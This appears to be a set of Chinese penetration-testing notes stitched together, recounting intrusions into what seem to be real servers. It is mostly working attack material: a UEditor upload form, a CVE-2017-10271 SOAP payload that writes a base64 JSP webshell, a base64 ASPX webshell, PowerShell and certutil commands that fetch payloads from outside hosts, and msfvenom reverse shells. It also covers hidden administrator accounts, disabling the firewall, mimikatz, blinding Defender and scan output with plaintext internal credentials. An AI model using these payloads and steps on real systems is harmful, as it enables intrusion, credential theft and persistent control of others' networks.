#### 开局一个超级老的weblogic弱口令进入
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0b033512b903c516c145f73412620162.png)
和新版本的界面风格还是差很多的，关键功能点找了半天
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7db2489be4bf6d8723aa955dd6b713c0.png)
应用部署，test.war冰蝎马，部署成功，连接失败
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7828c6ecbc60de7c3a5654daa57d7ee4.png)
**猜测Jdk版本过低，根据网上教程尝试利用axis来实现getshell**
[实战之低版本tomcat-getshell](https://mp.weixin.qq.com/s/nPYrT-EWINsU0cUIr-JfWg)
##### 1.安装最老版本的axis2
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/8fe88a14034ea33f64d75152ad322016.png)
失败，依然报错
从网上找到一个项目
[GitHub - shack2/SJavaWebManage: SJavaWebManage 采用低版本jdk1.3开发的网站管理工具，支持文件管理/命令执行/数据库管理。](https://github.com/shack2/SJavaWebManage)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/d9517cd87fdab9867694054dd3eb6d51.png)
重新部署，成功执行命令
##### 持久化后渗透
各种反弹shell的payload全部失败，原因未知，还好大马里面有对应的功能，成功反弹
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0b8e47dc1a2607a671bc8226ddada8c1.png)![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/722c57e6a117d00fe970420774596ea7.png)


记一次曲折的低版本Jdk Getshell

#### 1.Nday上传Webshell
```bash
<form action="http://125.xxx.xxx.157:xxx/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">

    <p>shell addr: <input type="text" name="source[]" /></p>

    <input type="submit" value="Submit" />

</form>
```
![v2-a7e09a8c4c92c1d9a3564d347c45efc5_1440w.webp](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0b84e456de94a18f52a3d78c5d2853f8.webp)
上传成功，根据返回的URL拼接webshell地址:
http://125.xxx.xxx.157:xxx/ueditor/net/upload/image/20240306/6384531551798079604497582.aspx
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0f76ee2b8164ec9e41c06d6574c9ea0f.png)
#### 2.上线到CS
当前低权限：
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/d90c1550c92b9964d4df85a96f78741c.png)
且`tasklist /svc`发现Window DF ，选择上传免杀马或内存加载到CS使用插件进行提权，这里通过
[GitHub - INotGreen/Webshell-loader: ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）](https://github.com/INotGreen/Webshell-loader)
Bypass Windos DF
上传Bypass.aspx到目标网站目录下，访问`http://125.xxx.xxx.157:xxx/bypass.aspx?shellcodeURL=http://x.x.x.x/download/fxxx`
上线成功，直接使用Badpotato进行提权到System
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/cc3378980ae91df62a4b282b38900cfd.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/65d70f635c613ee9e30d717f70db6fbe.png)
这里ladon失败了，大概率是被DF直接杀了，上传免杀自编译的坏土豆太麻烦了
这里选择上传免杀马通过哥斯拉自带的坏土豆(是内存加载形式，所以不会被杀)重新上线获得System权限，如下
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0b25d3635b7aab9a903a11ab2512c82e.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/2db40b9a0ef2eb27b5fc349d85c16704.png)
然后就是加用户-->开3389-->远程连接一条龙
```bash
#方法一
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
#方法二
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#关闭防火墙
netsh advfirewall set allprofiles state off
```
```bash
net user test$ Pass0822.. /add  添加用户名为name，密码为pass
net localgroup Administrators test$ /add  将用户名为uname的用户添加到管理员组
net user test$ /del 删除uname用户
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/2aa8a67e4500d8081e2b56fa784555b8.png)
#### 3.内网漫游
祭出大杀器Fscan跑一遍C段
```bash
[Camera]
[*] WebTitle http://192.168.1.107      code:403 len:4808   title:IIS 10.0 詳細錯誤 - 403.4 - Forbidden


[Mssql]
[+] mssql 192.168.1.206:1433:sa !QAZ2wsx


[Redis]
[+] Redis 192.168.1.34:6379 unauthorized file:C:\Program Files\Redis/dump.rdb


[MS17-010]
[+] MS17-010 192.168.1.76	(Windows 7 Home Basic 7601 Service Pack 1)


[POC]
[+] PocScan http://192.168.1.107:8001 poc-yaml-ueditor-cnvd-2017-20077-file-upload 
[+] PocScan http://192.168.1.107:8002 poc-yaml-ueditor-cnvd-2017-20077-file-upload 


[INFO]
[+] InfoScan http://192.168.1.131:3000 [Gitea简易Git服务] 
```
加入了密码表重新跑了一遍fscan结果更多了
```abap
[Redis]
[+] Redis 192.168.1.34:6379 unauthorized file:C:\Program Files\Redis/dump.rdb


[FTP]
[+] ftp 192.168.1.20:21:admin !QAZ2wsx
[+] ftp 192.168.1.21:21:admin !QAZ2wsx


[Mssql]
[+] mssql 192.168.56.1:1433:sa !QAZ2wsx
[+] mssql 192.168.1.206:1433:sa !QAZ2wsx


[SSH]
[+] SSH 192.168.1.20:22:admin !QAZ2wsx
[+] SSH 192.168.1.21:22:admin !QAZ2wsx


[MS17-010]
[+] MS17-010 192.168.1.76	(Windows 7 Home Basic 7601 Service Pack 1)


[INFO]
[+] InfoScan http://192.168.1.131:3000 [Gitea简易Git服务] 


192.168.1.34	6379	Redis	anonymous	anonymous
192.168.1.77	445	SMB	administrator	123456
192.168.1.86	445	SMB	administrator	123456	
192.168.1.88	445	SMB	administrator	123456
192.168.1.70	445	SMB	administrator	123456
192.168.1.206	1433	SQLServer	sa	!QAZ2wsx
192.168.1.21	445	SMB	administrator	123456
192.168.1.20	445	SMB	administrator	123456
  192.168.1.203	445	SMB	administrator	!QAZ2wsx
192.168.1.132	445	SMB	administrator	!QAZ2wsx
192.168.1.205	445	SMB	administrator	!QAZ2wsx
192.168.1.203	445	SMB	administrator	!QAZ2wsx
192.168.1.132	445	SMB	administrator	!QAZ2wsx
192.168.1.205	445	SMB	administrator	!QAZ2wsx
192.168.1.76	445	SMB	administrator	123456
192.168.1.203	3389	RDP	administrator	!QAZ2wsx

```
##### Mssql弱口令-Getshell-192.168.1.206
工具方法很多，这里利用**SharpSQLTools**进行getshell
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/e4de9809290b0e3ef234a8d13a6c0823.png)
同样的低权限，同样的DF。**SharpSQLToolsGui**提供了上传功能，上传免杀马，坏土豆提权上线，
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/8829e8a005fa9d344fd408425c74d416.png)
`SQLTools.exe 192.168.1.206 sa !QAZ2wsx master clr_badpotato  d:\temp\txgamedownload\EnumDesktopWindows.exe`
后面发现这里也没必要上传CS，该电脑的DF会拦截明文密码抓取等操作，马子动态免杀没做好，老掉。不如一条龙。
开3389-->加用户--->远程连接 (这里也有坑，开启3389后，需要关闭防火墙)![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9d9136844a74e18504bf5a6005cbaafd.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/4daf348e8128d7bb9286a090bb81612a.png)
启动RealBlindingEDR 致盲DF，在该本机上运行mimikatz
抓取明文密码时，报错：`ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list`，后下载最新Mimikatz解决
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/1724453120214ca7cbbc8ec360431e90.png)
`mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > 1.txt`
没解出来，Hash加入密码表

##### Ms-17010-Getshell-192.168.1.76
利用大佬的方程式套件Exp
```bash
1.check.bat 192.168.1.76
2.ms17-010.bat 192.168.1.76 WIN72K8R2  [ XP//////WIN72K8R2]
3.go.bat 192.168.1.76 x64

打完直接cmd里面弹一个shell
必须按照流程执行
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/73f70a2ce7f711d39e72fb5ccd7e1a14.png)
成功弹回shell
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/82a9c31f7d85f016cd698c809f164609.png)
`tasklist /svc`发现无AV (如果有 ，估计也打不成)
生成web投递，使用如下命令下载
`certutil.exe -urlcache -split -f http://1xx.xx.xx13:2xxx1/a.exe 1.exe`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/bc86893834e404db00520f5ad8e056f2.png)
执行上线，如下
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7bf4fef62809f9002ef0fbc5ccb0368f.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/cba31e2bb1ffa7a479b6eb6dbf69a93c.png)![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/6b80d931e147e308af988db6fbb95374.png)
抓取hash，果然又看到了这个密码
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b444d562730047e03812a501750ea1d8.png)
剩下的通过Psexec等远程执行命令上线，就不再赘述了，这里安利Ladon GUI，小白无脑操作
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/18d7e39974216147a735f31d24e43fb6.png)


UEditor编辑器文件上传到内网漫游

```http
POST /Login/ValidateLogin HTTP/1.1
Host: x.53.172.x:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36

userName=admin*&password=admin123
```
已知存在sql注入

`python .\sqlmap.py -r .\1.txt --dbms=mssql  --batch  --os-shell --threads 10 --force-ssl` 交给sqlmap
### 艰难上线
进入![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0a9eea02a39a10430b4457a1fb1a7242.png)
希望上线到CS或获取稳定的Webshell
#### 1.powershell上线   
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/4f5f2edfcadfa21b3a63a542ee4305a5.png)
运行
`powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('[http://142.171.34.13:22251/x'))"](http://142.171.34.13:22251/x'))")`
X 失败（预测杀软拦截，可能流量和进程两个方向的拦截）
#### 2.获取web目录写webshell
`wmic logicaldisk get name`获取所有磁盘
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/78ce99bc311430c6c3e9e2f695809693.png)
/login_bg.png
找到某特征文件，`dir /s /p d:\login_bg.png` 全盘搜索
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/879740aefbbe3dbefa024b53f54875a0.png)
获得根目录，猜测BAK是备份文件夹
直接执行
`echo ^<%eval request("chopper")%^> > 'd:\Website\admin\Content\images/2.aspx'`
失败
`echo ^<%eval request("chopper")%^> > 'd:\Website\admin\Content\images/2.txt'`
成功
猜测是写入一句话过于敏感被杀软拦截
#### 3.上传免杀木马，通过os-shell运行
`python .\sqlmap.py -r .\1.txt --dbms=mssql  --batch --file-write  "C:/Penetration/ShellTools/Behinder/Behinder_v3.0_Beta_11/server/shell.aspx" --file-dest "d:/Website/admin/Content/images/2.aspx" -v1 --force-ssl`
尝试传免杀webshell
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/25055946d8da8f3469eab23516335d11.png)
上传失败，猜测同样被杀软拦截了
陷入僵局

#### 成功方法：
#### 1.certutil绕过
通过写入base64加密的asp然后通过certutil解密
```bash
echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiAlPgo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiPgogICAgcHVibGljIHN0YXRpYyBieXRlW10gdW5IZXgoYnl0ZVtdIGhleFN0cmluZyl7Ynl0ZVtdIGIgPSBuZXcgYnl0ZVtoZXhTdHJpbmcuTGVuZ3RoIC8gMl07Ynl0ZSBjO2ZvcihpbnQgaSA9IDA7IGkgPCBoZXhTdHJpbmcuTGVuZ3RoIC8gMjsgaSsrKXtjID0gaGV4U3RyaW5nW2kgKiAyXTtiW2ldID0oYnl0ZSkoKGMgPCAweDQwID8gYyAtIDB4MzAgOihjIDwgMHg0NyA/IGMgLSAweDM3IDogYyAtIDB4NTcpKTw8IDQpO2MgPSBoZXhTdHJpbmdbaSAqIDIgKyAxXTtiW2ldICs9KGJ5dGUpKGMgPCAweDQwID8gYyAtIDB4MzAgOihjIDwgMHg0NyA/IGMgLSAweDM3IDogYyAtIDB4NTcpKTt9cmV0dXJuIGI7fXB1YmxpYyBzdGF0aWMgYnl0ZVtdIGFlczEyOChieXRlW10gYnl0ZXMsaW50IG1vZGUpe1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUmlqbmRhZWxNYW5hZ2VkIGFlcyA9IG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpO2Flcy5QYWRkaW5nID0gU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZS5QS0NTNzthZXMuS2V5ID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCIwSjVZTTBmS2dZVnJtTWt3VFVJRitRPT0iKTthZXMuTW9kZSA9IFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZS5FQ0I7U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5JQ3J5cHRvVHJhbnNmb3JtIHRyYW5zZm9ybSA9IG1vZGUgPT0gMSA/IGFlcy5DcmVhdGVFbmNyeXB0b3IoKTogYWVzLkNyZWF0ZURlY3J5cHRvcigpO3JldHVybiB0cmFuc2Zvcm0uVHJhbnNmb3JtRmluYWxCbG9jayhieXRlcywgMCwgYnl0ZXMuTGVuZ3RoKTt9cHVibGljIHN0YXRpYyBieXRlW10geG9yKGJ5dGVbXSBkYXRhKXtieXRlW10ga2V5ID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCJSODRzaCs2dUo5b1hKcE1mdzJwYy9RPT0iKTtpbnQgbGVuID0gZGF0YS5MZW5ndGg7aW50IGtleUxlbiA9IGtleS5MZW5ndGg7aW50IGluZGV4ID0gMDtmb3IoaW50IGkgPSAxOyBpIDw9IGxlbjsgaSsrKXtpbmRleCA9IGkgLSAxO2RhdGFbaW5kZXhdID0oYnl0ZSkoZGF0YVtpbmRleF0gXiBrZXlbKGkgJSBrZXlMZW4pXSk7fXJldHVybiBkYXRhO30KICAgIHByb3RlY3RlZCB2b2lkIFBhZ2VfTG9hZChvYmplY3Qgc2VuZGVyLCBFdmVudEFyZ3MgZSkKICAgIHsKICAgICAgICAKICAgICAgICB0cnkgewogICAgICAgICAgICAKICAgICAgICAgICAgYnl0ZVtdIHJlcXVlc3REYXRhID0gUmVxdWVzdC5CaW5hcnlSZWFkKFJlcXVlc3QuQ29udGVudExlbmd0aCk7Ynl0ZVtdIF9yZXF1ZXN0RGF0YSA9IG5ldyBieXRlW3JlcXVlc3REYXRhLkxlbmd0aCAtIDExMl07QXJyYXkuQ29weShyZXF1ZXN0RGF0YSwxMTAsX3JlcXVlc3REYXRhLDAsX3JlcXVlc3REYXRhLkxlbmd0aCk7cmVxdWVzdERhdGEgPSBfcmVxdWVzdERhdGE7CiAgICAgICAgICAgIHJlcXVlc3REYXRhID0gdW5IZXgocmVxdWVzdERhdGEpO3JlcXVlc3REYXRhID0gYWVzMTI4KHJlcXVlc3REYXRhLCAyKTsKICAgICAgICAgICAgaWYgKEFwcGxpY2F0aW9uWyJMbURKbGUiXSA9PSBudWxsKSB7CiAgICAgICAgICAgICAgICBBcHBsaWNhdGlvblsiTG1ESmxlIl0gPSAoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpdHlwZW9mKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KS5HZXRNZXRob2QoIkxvYWQiLAogICAgICAgICAgICAgICAgICAgIG5ldyBTeXN0ZW0uVHlwZVtdIHsKICAgICAgICAgICAgICAgICAgICAgICAgdHlwZW9mIChieXRlW10pCiAgICAgICAgICAgICAgICAgICAgfSkuSW52b2tlKG51bGwsIG5ldyBvYmplY3RbXSB7CiAgICAgICAgICAgICAgICAgICAgcmVxdWVzdERhdGEKICAgICAgICAgICAgICAgIH0pOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSBtZW1vcnlTdHJlYW0gPSBuZXcgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSgpOwogICAgICAgICAgICAgICAgU3lzdGVtLklPLkJpbmFyeVdyaXRlciBhcnJPdXQgPSBuZXcgU3lzdGVtLklPLkJpbmFyeVdyaXRlcihtZW1vcnlTdHJlYW0pOwogICAgICAgICAgICAgICAgb2JqZWN0IG8gPSAoKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KSAgQXBwbGljYXRpb25bIkxtREpsZSJdKS5DcmVhdGVJbnN0YW5jZSgiTFkiKTsKICAgICAgICAgICAgICAgIG8uRXF1YWxzKHJlcXVlc3REYXRhKTsKICAgICAgICAgICAgICAgIG8uRXF1YWxzKG1lbW9yeVN0cmVhbSk7CiAgICAgICAgICAgICAgICBvLlRvU3RyaW5nKCk7CiAgICAgICAgICAgICAgICBieXRlW10gcmVzcG9uc2VEYXRhID0gbWVtb3J5U3RyZWFtLlRvQXJyYXkoKTsKICAgICAgICAgICAgICAgIG1lbW9yeVN0cmVhbS5TZXRMZW5ndGgoMCk7CiAgICAgICAgICAgICAgICByZXNwb25zZURhdGEgPSB4b3IocmVzcG9uc2VEYXRhKTtyZXNwb25zZURhdGEgPSBTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKENvbnZlcnQuVG9CYXNlNjRTdHJpbmcocmVzcG9uc2VEYXRhKSk7CiAgICAgICAgICAgICAgICBhcnJPdXQuV3JpdGUoQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCJleUpqYjJSbElqb3dMQ0prWVhSaElqcDdJbk4xWjJkbGMzUkpkR1Z0Y3lJNlcxMHNJbWRzYjJKaGJDSTZJbVV4U2xSUldEQndXZz09IikpO2Fyck91dC5Xcml0ZShyZXNwb25zZURhdGEpO2Fyck91dC5Xcml0ZShDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoIklpd2laWGhFWVhSaElqcDdJbUZ3YVY5bWJHOTNNREVpT2lJd0lpd2lZWEJwWDJac2IzY3dNaUk2SWpBaUxDSmhjR2xmWm14dmR6QXpJam9pTVNJc0ltRndhVjltYkc5M01EUWlPaUl3SWl3aVlYQnBYMlpzYjNjd05TSTZJakFpTENKaGNHbGZabXh2ZHpBMklqb2lNQ0lzSW1Gd2FWOW1iRzkzTURjaU9pSXdJaXdpWVhCcFgzUmhaeUk2SWpJaUxDSnNiMk5oYkY5amFYUjVhV1FpT2lJdE1TSjlmWDA9IikpO3Jlc3BvbnNlRGF0YSA9IG1lbW9yeVN0cmVhbS5Ub0FycmF5KCk7UmVzcG9uc2UuU3RhdHVzQ29kZSA9IDIwMDtSZXNwb25zZS5BZGRIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL2pzb24iKTtSZXNwb25zZS5CaW5hcnlXcml0ZShyZXNwb25zZURhdGEpOwoKICAgICAgICAgICAgfQogICAgICAgIH0gY2F0Y2ggKFN5c3RlbS5FeGNlcHRpb24pIHsKCiAgICAgICAgfQogICAgICAgIAogICAgfQoKPC9zY3JpcHQ+Cg== > D:/Website/admin/Content/images/t.asp
```
certutil -decode "D:/Website/admin/Content/images/t.asp" "D:/Website/admin/Content/images/s.aspx"

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/5685473c57211190efc039ef6a18b039.png)

连接成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b8f30a24400e6bdd7a94264c0202146b.png)
最后上线发现全部都是被defender拦截了
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/16f793dfa6d0fe3cad29c5db8590bfcc.png)

此时iis的权限，上传免杀马成功，但是2分钟后被杀，无法再上传。
此时方向：
1.上传更强的免杀  X能力不足
2.kill av  X被杀 
3.defender 加白  X失败 权限太低
4.哥斯拉的shellcodeloader加载  X失败 原因未知（**shellcode 要删除\x部分才能加载**）
#### 2. ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）（严重注意.ashx不能使用会导致崩站）
通过该下面[https://github.com/INotGreen/Webshell-loader](https://github.com/INotGreen/Webshell-loader)
上传Bypass.aspx，访问
`[https://x.53.172.x2:8080/Content/images/bypass.aspx?shellcodeURL=http://下x.x.x.x/download/](https://192.53.172.222:8080/Content/images/bypass.aspx?shellcodeURL=http://142.171.34.13:22251/download/file.ext)fxxx`
[http://142.171.34.13:22251/download/fxxx](http://142.171.34.13:22251/download/fxxx)
成功上线
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/28b7855eaed1fb9abf27b90b04b5bcd3.png)

[h](http://172.245.17.142:22251/download/file.ext)
### 后渗透提权：
##### 使用Bad[Potato](https://github.com/BeichenDream/GodPotato)提权至Sytem
期间因为未知原因，在CS上无法使用Bad[Potato](https://github.com/BeichenDream/GodPotato)，后利用他人CS的Bad[Potato](https://github.com/BeichenDream/GodPotato)提权成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/369ed15a4996993997f7ca099eb788ed.png)

猜测原因：服务器问题，profile文件问题，caddy反代
miks等cs插件运行逻辑:生成傀儡子进程，将miks注入到内存，不是自注入
##### 其他方法：
使用哥斯拉的内存加载BadPotato进行利用（Badpotato无法落地）
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/71818a296e0a1a12ece8f70e4d5fbe18.png)
或使用donut.exe生成shellcode格式，进行内存加载



两个问题：
1.cs的badpoto无法使用
2.exe转shellcode如何使用



后续推荐针对Sqlserver数据库的os-shell的增强利用工具：[Sqlmapxplus](https://github.com/co01cat/SqlmapXPlus)

记一次SQL注入的艰难getshell

目标:180.43.xxx.37
存在 CVE-2017-10271  漏洞


![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0cde8bce1e22c932b3ae771807ded8c5.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a42458716473d9230cbab389150c5188.png)
```abap
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 180.43.xxx.37
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext
            xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                        <string><![CDATA[ 
                      nslookup `whoami`.po9.eyes.sh
                        ]]></string> </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

```
代码中`<![CDATA[恶意代码]]>`可以防止xml解析恶意代码导致命令执行失败
由于该机器不出网
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3c7ab4967c22c89f3ce0ff82176f28f5.png)
虽然能够命令执行，但是无法远程下载文件，而且一般的weblogic工具无法直接利用，上传webshell和内存马
此时陷入僵局
通过大佬的建议，寻找到了dns的命令执行回显工具
[https://github.com/A0WaQ4/HexDnsEchoT](https://github.com/A0WaQ4/HexDnsEchoT)
`python3 HexDnsEchoT.py -d wemxjs.ceye.io -t 0346c416f8ffb87c8261efcb1e626282`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/89bf8ef044c15f5acd66bcbadd72ee1a.png)
思路：
既然不出网，也没办法直接注入内存马，寻找路径，手动写马
通过佩奇文库里面的poc
[https://peiqi.wgpsec.org/wiki/webserver/Weblogic/Weblogic%20XMLDecoder%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2017-10271.html](https://peiqi.wgpsec.org/wiki/webserver/Weblogic/Weblogic%20XMLDecoder%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2017-10271.html)
可知一般的weblogic写马目录路径如下（既命令执行的路径下的相对路径）
`servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp`
不修改路径的情况下，直接写马失败，404，因为路径9j4dqk部分是随机生成
使用dns回显工具探出回显
使用命令`find . -type d -name "bea_wls_internal" `寻找关键文件夹
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3b9aa5c4230c4389cdd0dc955b677eed.png)
将python生成的命令替换进poc，等待dns回显
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/949480430e0574e165c175f81e264266.png)
可以看到存在两个bea_wls_internal文件夹
再分别使用命令 
`ls ./servers/ManagedServer01/tmp/_WL_internal/bea_wls_internal -R`
`ls ./servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal -R`
获取到关键文件夹名称`t4zxy5`、`dvnmqm`
分别写入冰蝎马
```xml
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 180.43.xxx.37
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext
            xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                        <string><![CDATA[ 
                       echo  'PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7Lyror6Xlr4bpkqXkuLrov57mjqXlr4bnoIEzMuS9jW1kNeWAvOeahOWJjTE25L2N77yM6buY6K6k6L+e5o6l5a+G56CBcmViZXlvbmQqL3Nlc3Npb24ucHV0VmFsdWUoInUiLGspO0NpcGhlciBjPUNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KDIsbmV3IFNlY3JldEtleVNwZWMoay5nZXRCeXRlcygpLCJBRVMiKSk7bmV3IFUodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLmcoYy5kb0ZpbmFsKG5ldyBzdW4ubWlzYy5CQVNFNjREZWNvZGVyKCkuZGVjb2RlQnVmZmVyKHJlcXVlc3QuZ2V0UmVhZGVyKCkucmVhZExpbmUoKSkpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7fSU+' | base64 --decode > ./servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal/dvnmqm/war/1.jsp
                        ]]></string> </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

```
其中为防止echo出错，使用base64加解密如下
最后的绝对路径`/opt/Oracle/Middleware/user_projects/domains/base_domain/servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal/dvnmqm/war/`
`echo 'base64_string' | base64 --decode > 1.jsp`
成功连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/8444dffa7ac080064b3530f3b88b29ad.png)

记一次不出网的weblojic-getshell

VPS: 172.2x.x.x
端口：8001
代理：suo5代理

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/add36ebd456f391c9dfca6005e5aa8cb.png)
附上Proxifer规则配置。10段的ip都走代理
![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/adab0da7f7ad8613cc828cd913d4fb89.jpeg)
通过webshell，利用msf生成木马
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.245.17.142 LPORT=8001 -a x86 --platform Linux -f elf > shell.elf
```
```
root@kali:~# msfconsole 
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 444	4
msf5 exploit(multi/handler) > run
meterpreter > 
```
